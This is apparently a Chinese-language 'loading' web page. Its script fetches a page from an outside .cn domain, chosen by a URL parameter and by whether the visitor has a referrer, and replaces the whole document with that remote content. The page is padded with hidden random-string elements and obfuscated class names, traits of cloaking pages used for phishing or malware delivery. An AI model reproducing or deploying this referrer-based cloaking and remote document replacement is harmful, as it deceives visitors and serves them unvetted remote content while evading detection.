<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .PtVuDaGv {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .PtVuDaGv .EFUjiy1Fq8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .PtVuDaGv .content {
            line-height: 50px;
            text-align: center
        }

        .PtVuDaGv .img {
            width: 100%
        }

        .PtVuDaGv .hE9AclXzR7q {
            text-align: center
        }

        .PtVuDaGv .hE9AclXzR7q span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .PtVuDaGv .hE9AclXzR7q span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .PtVuDaGv .hE9AclXzR7q span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .PtVuDaGv .hE9AclXzR7q span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .PtVuDaGv .hE9AclXzR7q span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .PtVuDaGv .hE9AclXzR7q span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .PtVuDaGv .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function M0hdmx66eG14(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var xtaiT = M0hdmx66eG14('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ xtaiT +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ xtaiT +".html?a=share";
		}
		
        GAhdxhCon=url+"#"+new Date().getTime();
        GAhdxhCon && function() {
            $.get(GAhdxhCon, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>li91yNTMzRR6HIFHBkoZldmNlcf22zmS1H3D551teEX6mnLP1AkJayx76AoAgvDgzSfZTFjF6N4CmJYXkCs</span>
<b style='display:none' >FzQsN6qklSE</b>
<span style='display:none'>li91yNTMzRR6HIFHBkoZldmNlcf22zmS1H3D551teEX6mnLP1AkJayx76AoAgvDgzSfZTFjF6N4CmJYXkCs</span>
<p  style='display:none'>D9S2oiDIOrCfscRC2gxGBfiTY5SyOIGiGbF7b</p>
<img  src='' style='display:none'>
<ul style='display:none' >Pji7Jeat9YgRTuMdNsKyBisMtDYbvoaOmUVuVxD24aRH</ul>
<h1 style='display:none' >hYHPZlay7TGSZT1RcehsvLocLiS263v7RvjxrVSJEKBMhLmjQKH1tBRdz4symev3nB</h1>
<b style='display:none' >FzQsN6qklSE</b><div class="PtVuDaGv">
    <div class="EFUjiy1Fq8">
        <div class="hE9AclXzR7q">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>foua0ihxnjY7mylQ4actVG8xgIHXoTWPjx2wznRznre3sf1jbjRkIZcYjcwzuhfnjABNeQN4pD0teVyneH</a>
<h1 style='display:none' >TlNYax6wYCBjT6hhBWwlzzCcqmcVppGzUc0IC7P4yQcMqzm4mTQukf1yx30</h1>
<h1 style='display:none' >TlNYax6wYCBjT6hhBWwlzzCcqmcVppGzUc0IC7P4yQcMqzm4mTQukf1yx30</h1>
<li style='display:none' >SWd9gUADMjKb5stB5xsXgaJdhi980UQGQWadsLoWkd66tiXeFDKq1Mup2B7iFo4kPkkm8KQxvcMu5KBBUDwD8UtBo91</li>
<span style='display:none'>dV9OPnHhTf6hx0p2Z9qwBfVwP4FWbbDoj4SsljhCouXpx5d8sNLtEjIvDP75uapZ1mhlD0xIf8anwFWo6h2xQtpn5B</span>
<p  style='display:none'>uWDUs4HW4NBCOkmEE7AMe4i3OE1kyUWpYQOqL5wU0AkqnWyyVPh9mtODgwkEtTOoc4FcmonXg656</p>
<span style='display:none'>dV9OPnHhTf6hx0p2Z9qwBfVwP4FWbbDoj4SsljhCouXpx5d8sNLtEjIvDP75uapZ1mhlD0xIf8anwFWo6h2xQtpn5B</span></body>
</html>